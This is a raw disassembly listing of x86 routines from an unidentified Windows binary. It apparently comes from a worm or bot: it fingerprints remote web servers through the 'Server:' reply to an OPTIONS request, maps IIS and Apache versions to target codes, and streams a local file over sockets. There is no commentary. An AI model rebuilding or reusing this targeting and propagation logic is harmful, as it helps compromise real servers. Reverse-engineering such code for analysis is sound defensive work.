loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41DA68[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov dword_41EB20, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp dword_41EB20, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41EC40
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DAB4
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CC64
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CC68
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EB24
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CC6C
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CC70
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EB24
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CCA8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: sub_4167F1+DA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, dword_41CCF6[ecx]
and ecx, 0FFh
mov eax, off_41CCFE[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov off_41CCFE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov dword_41CCF6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp dword_41CCF6[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, dword_41CCF6[eax]
cmp eax, dword_41CCF6[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset dword_41CD90
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CD88
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CD80
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
